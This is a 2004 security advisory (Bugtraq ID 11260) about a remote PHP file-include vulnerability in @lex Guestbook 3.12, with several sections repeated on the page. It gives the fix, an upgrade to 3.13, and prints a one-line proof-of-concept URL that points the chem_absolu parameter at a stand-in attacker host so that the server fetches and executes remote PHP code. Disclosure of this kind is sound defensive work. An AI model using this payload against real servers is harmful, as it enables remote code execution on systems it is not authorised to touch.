@lexPHPTeam @lex Guestbook Remote PHP File Include Vulnerability
BID:11260
Info
@lexPHPTeam @lex Guestbook Remote PHP File Include Vulnerability
| Bugtraq ID: | 11260 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 27 2004 12:00AM |
| Updated: | Sep 27 2004 12:00AM |
| Credit: | Discovery of this vulnerability is credited to Himeur Nourredine <[email protected]>. |
| Vulnerable: |
@lexPHPTeam @lex Guestbook 3.12 |
| Not Vulnerable: |
@lexPHPTeam @lex Guestbook 3.13 |
Discussion
@lexPHPTeam @lex Guestbook Remote PHP File Include Vulnerability
A vulnerability is reported to exist in the @lexPHPTeam @lex Guestbook software that may allow an attacker to include malicious PHP files containing arbitrary code to be executed on a vulnerable system. The issue exists due to improper validation of user-supplied data.
Remote attackers could potentially exploit this issue via a vulnerable variable to include a remote malicious PHP script, which will be executed in the context of the web server hosting the vulnerable software.
A vulnerability is reported to exist in the @lexPHPTeam @lex Guestbook software that may allow an attacker to include malicious PHP files containing arbitrary code to be executed on a vulnerable system. The issue exists due to improper validation of user-supplied data.
Remote attackers could potentially exploit this issue via a vulnerable variable to include a remote malicious PHP script, which will be executed in the context of the web server hosting the vulnerable software.
Exploit / POC
@lexPHPTeam @lex Guestbook Remote PHP File Include Vulnerability
No exploit is required.
The following proof of concept has been supplied:
http://www.example.com/include/livre_include.php?no_connect=lol&chem_absolu=http://[attacker]/file.ext%3f
No exploit is required.
The following proof of concept has been supplied:
http://www.example.com/include/livre_include.php?no_connect=lol&chem_absolu=http://[attacker]/file.ext%3f
Solution / Fix
@lexPHPTeam @lex Guestbook Remote PHP File Include Vulnerability
Solution:
This issue has been addressed in version 3.13 of the software.
@lexPHPTeam @lex Guestbook 3.12
Solution:
This issue has been addressed in version 3.13 of the software.
@lexPHPTeam @lex Guestbook 3.12
-
@lexPHPTeam@lexPHPTeam @lex Guestbook 3.13
http://www.alexphpteam.com/download.php
References
@lexPHPTeam @lex Guestbook Remote PHP File Include Vulnerability
References:
References:
- @lex Guestbook Homepage (@lexPHPTeam)
- @lex Guestbook (PHP) Include file (Himeur Nourredine
)